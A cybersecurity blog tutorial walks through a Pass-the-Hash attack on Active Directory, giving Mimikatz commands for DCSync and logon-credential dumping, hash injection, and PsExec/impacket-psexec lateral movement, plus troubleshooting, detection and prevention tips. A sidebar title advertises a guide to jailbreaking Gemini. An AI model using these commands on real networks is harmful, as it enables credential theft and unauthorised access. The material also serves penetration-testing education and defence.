Write
OneWriteup
  • Login
  • Trending
  • Articles
  • Blog
  • Tutorials
  • News
  • Research
  • Top 10 Lists
  • Case Studies
  • Writeup
  • Interviews
  • Personal Stories
  • Infographics
No Result
View All Result
  • Trending
  • Articles
  • Blog
  • Tutorials
  • News
  • Research
  • Top 10 Lists
  • Case Studies
  • Writeup
  • Interviews
  • Personal Stories
  • Infographics
No Result
View All Result
OneWriteup
No Result
View All Result

How to perform Pass The Hash Attack on Active Directory in 2025?

FOUNDER by FOUNDER
August 19, 2025
Reading Time: 12 mins read
22
0
Pass The Hash
Share on FacebookShare on Twitter

What is Pass The Hash Attack?

Pass The Hash is a type of attack technique in which attacker steals the hashed user’s password and this hash is used to authenticate user or services. This technique bypasses standard authentication steps that normally require a user’s original password, allowing attackers seamless entry as though they were legitimate users

Requirements for Pass The Hash Attack?

  1. The attacker must have some form of access to the target system, which could be through compromised credentials, phishing, or exploiting vulnerabilities.
  2. Extracted NTLM hashes.
  3. Administrative access privileges on the initial compromised system.

Tools Used In Pass The Hash Attack?

  1. Impacket :  A tool written on python used for penetration testing network protocols.
  2. Mimikatz : Mimikatz is a powerful open-source tool that helps to extract credentials on Windows operating systems.

How to perform Pass The Hash Attack on Active Directory?

Steps to Perform the Attack

Step 1. Dump NTLM Hashe of specific user Using DC Sync

First, you need to dump the hashes of user accounts from the Domain Controller (DC). Use Mimikatz for this:

lsadump::dcsync /domain:server.local /user:Rosetta.Jena

This command will retrieve the NTLM hash for the specified user.

Dump hash of all stored logon credentials from the current sessions on the machine using mimikatz tool.

privilege::debug

 

sekurlsa ::logonpasswords

Pass The Hash Attack

Step 2. Perform the Pass-the-Hash Attack

With the required hash in hand, execute the following command in Mimikatz:

privilege::debug

 

sekurlsa::pth /user:username_here /domain:domain.local /ntlm:hash_here

Pass The Hash Attack

  • /user:username_here: The target username.
  • /domain:domain.local: The domain of the target account.
  • /ntlm:hash_here: The NTLM hash of the target user.

Step 3. A new command prompt will automatically open

In that terminal, run:

PsExec.exe \\10.0.0.71 cmd.exe
  • 10.0.0.71: The IP address of the victim’s machine.

 

OR

Step 1 Using Impacket to perform Pass The Hash Attack.

Once you have the NTLM hash, use Impacket to authenticate to the target system:

impacket-psexec 'SERVER/username@IP_HERE' -hashes 'ntlm_hash_here'
  • SERVER: The target server or workstation.
  • username: The username for which you have the hash.
  • IP_HERE: The IP address of the target machine.
  • ntlm_hash_here: The NTLM hash obtained from the previous step.

Complete Video Tutorial

 

Troubleshooting Common Errors.

Error: “Make sure that the default admin$ share is enabled.”

If you encounter this error, follow one of the solutions below:

Solution 1: Enable the admin$ share.

  1. Go to C:\Windows.
  2. Right-click and select Properties.
  3. Click on Advanced Sharing.
  4. Check the box for Share this folder.
  5. Enter the name admin$.
  6. Hit Permissions, and it is recommended to remove ‘Everyone’ and add only the users that PsExec will use for execution.

Solution 2: Ensure the victim user has local administrator privileges on their machine.

How to detect pass the hash attack using SIEM?

To detect Pass-the-Hash attacks in a SIEM, monitor authentication logs for anomalies (Event ID 4624 for successful logons, 4625 for failed logons), track NTLM authentication, identify the use of administrative tools (Event ID 4688 for process creation), analyze lateral movement patterns, check for anomalous account behavior, enable specific event alerts, monitor network traffic, leverage threat intelligence, correlate events across sources, and conduct regular audits and reviews.

How to prevent Pass The Hash Attack?

  1. Implement MFA and prefer Kerberos over NTLM for stronger authentication.
  2. Apply the principle of least privilege and use dedicated admin workstations.
  3. Keep systems updated with patches and monitor for vulnerabilities.
  4. Enforce strong password policies and educate users on password hygiene.
  5. Limit access to critical systems and control lateral movement through segmentation.
  6. Monitor authentication logs and use Intrusion Detection Systems (IDS).
  7. Enable Windows Credential Guard and disable NTLM where feasible.
  8. Conduct regular audits of user accounts and remove unused accounts.
  9. Provide security awareness training and conduct phishing simulations.
  10. Use anti-virus solutions and regularly scan endpoints for vulnerabilities.

Conclusion

This guide provides a structured approach to performing a Pass-the-Hash attack using Mimikatz and Impacket in a Windows environment. Always ensure that you have permission to conduct such activities in your network to comply with legal and ethical standards.

Read Similar Articles:

How to perform Golden Ticket Attack in Active Directory in 2025?

Disclaimer: This blog is for educational purposes only, promoting awareness of ethical hacking and cybersecurity to help readers protect against cyber threats. All content is based on lawful experiments on our own systems. No illegal activities are endorsed. Users agree to apply the information responsibly and legally. The blog and author are not liable for any misuse. By using this blog, you agree to use all knowledge ethically and legally. [Read full disclaimer].

 

Buy me a coffee
FOUNDER

FOUNDER

Cybersecurity aficionado committed to disseminating expertise, crafting articles that empower others to resolve errors and fortify online defenses with ease.

Recently Posted

Beginner’s Guide to Reverse Engineering Malware with dnSpy

Beginner’s Guide to Reverse Engineering Malware with dnSpy.

August 19, 2025
184
DNS Based Data Exfiltration Using Burp Collaborator Client

DNS Based Data Exfiltration Using Burp Collaborator Client

August 19, 2025
147
Jailbreak Gemini 2.5 Pro: A Guide to CLI Access and Jailbreaking in Kali Linux

Jailbreak Gemini 2.5 Pro: A Guide to CLI Access and Jailbreaking in Kali Linux

August 19, 2025
1.4k
HOW To BECOME AN ETHICAL HACKER ROADMAP

Free Cybersecurity Roadmap for Ethical Hacking Career in 2025

August 19, 2025
890
Load More

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Recommended

NIST 2024 password guidelines

NIST Password Guidelines 2024: Everything You Need to Know

August 19, 2025
209
What is Access Control List (ACL) and How to exploit it in Active Directory?

What is Access Control List (ACL) and How to exploit it in Active Directory?

August 19, 2025
189

Popular Story

  • Jailbreak Gemini 2.5 Pro: A Guide to CLI Access and Jailbreaking in Kali Linux

    Jailbreak Gemini 2.5 Pro: A Guide to CLI Access and Jailbreaking in Kali Linux

    248 shares
    Share 99 Tweet 62
  • How to use Bloodhound / Sharphound for Pentesting Active Directory?

    134 shares
    Share 54 Tweet 34
  • OSCP vs OSCP+: What New Changes Have Been Made?

    122 shares
    Share 49 Tweet 31
  • NoSQL Injection Complete Guide, Types, Examples, Cheat Sheet

    59 shares
    Share 24 Tweet 15
  • 100 Most Asked SOC Analyst Interview Questions For Freshers

    127 shares
    Share 51 Tweet 32

Support This Write-Up. Fund the Next

Buy me a coffee
OneWriteup

Discover expert cybersecurity articles, tutorials, and the latest trends to protect your digital world.

  • Disclaimer
  • About Us
  • Feedback
  • Contact Us
  • Report
  • Privacy Policy
  • Community Guidelines
  • Terms Of Service

© 2024 OneWriteup

No Result
View All Result
  • Trending
  • Articles
  • News
  • Blog
  • Tutorials
  • Research
  • Top 10 Lists
  • Case Studies
  • Interviews
  • Login

© 2024 OneWriteup

Welcome Back!

Login to your account below

Forgotten Password?

Retrieve your password

Please enter your username or email address to reset your password.

Log In